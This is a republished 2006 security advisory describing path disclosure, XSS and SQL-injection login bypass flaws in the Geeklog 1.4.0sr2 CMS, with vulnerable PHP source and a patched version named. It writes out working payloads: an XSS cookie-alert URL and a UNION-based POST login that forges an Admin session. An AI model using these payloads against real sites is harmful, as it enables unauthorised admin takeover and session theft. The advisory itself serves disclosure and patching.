geeklog multiple vulnerabilities

2006.05.31
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

KAPDA New advisory Vendor: http://www.geeklog.net Bugs: Path Disclosure, XSS, SQL Injection (Authentication bypass) Vulnerable Version: geeklog-1.4.0sr2(prior versions also may be affected) Exploitation: Remote with browser Description: -------------------- geeklog is a freely available PHP-based web content management system that uses a MySQL database. Vulnerabilities: -------------------- -->>Path Disclosure<<-- Reason: direct access to special files that generates php error with installation path information. Several files are vulnerable in this case. Example: http://example.com/geeklog/layout/professional/functions.php http://example.com/geeklog/getimage.php?mode=show&#132;&#145;=dd -->>XSS<<-- Reason: the script doesn't properly validate user supplied input in getimage.php that result in xss vulnerability Example: http://example.com/geeklog/getimage.php?mode=show&#132;&#145;=./<IMG%20SRC=JaV aScRiPt:alert(document.cookie)> Code Snippets: /getimage.php line#100-103 $display = COM_errorLog('File, ' . $downloader->getPath() . $image . ', was not found in getimage.php'); if ($mode == 'show') { echo COM_siteHeader ('menu') . $display . COM_siteFooter (); -->>SQL Injection (Authentication bypass)<<-- Reason: again the script doesn't properly validate user supplied input in /admin/auth.inc.php that may result in Authentication bypass using sql injection to gain admin privileges. Code Snippets: /admin/auth.inc.php line#44-45 if (!empty ($_POST['loginname']) && !empty ($_POST['passwd'])) { $status = SEC_authenticate ($_POST['loginname'], $_POST['passwd'], $uid); ../system/lib-security.php line#697-732 function SEC_authenticate($username, $password, &$uid) { global $_TABLES, $LANG01, $_CONF; $result = DB_query( "SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))" ); $tmp = mysql_errno(); $nrows = DB_numRows( $result ); if(( $tmp == 0 ) && ( $nrows == 1 )) { $U = DB_fetchArray( $result ); $uid = $U['uid']; if ($U['status'] == USER_ACCOUNT_DISABLED) { return USER_ACCOUNT_DISABLED; // banned, jump to here to save an md5 calc. } elseif ($U['passwd'] != md5( $password )) { return -1; // failed login } elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) { //awaiting approval, jump to msg. echo COM_refresh($_CONF['site_url'] . '/users.php?msg=70'); exit; } elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) { // Awaiting user activation, activate: DB_change($_TABLES['users'],'status',USER_ACCOUNT_ACTIVE,'username',$use rname); return USER_ACCOUNT_ACTIVE; } else { return $U['status']; // just return their status } } else { $tmp = $LANG01[32] . ": '" . $username . "'"; COM_errorLog( $tmp, 1 ); return -1; } } as you see there is no input validation here so when magic_quotes_gpc=off you can bypass login Authentication. Example: /admin/moderation.php POST data: loginname: me' union select 3,'3d2172418ce305c7d16d4b05597c6a59','email',2 from gl_users where username='Admin passwd: 22222 Solution: -------------------- Version geeklog-1.4.0sr3 is available now. http://www.geeklog.net/article.php/geeklog-1.4.0sr3 Original Advisory: -------------------- http://kapda.ir/advisory-336.html Credit: -------------------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top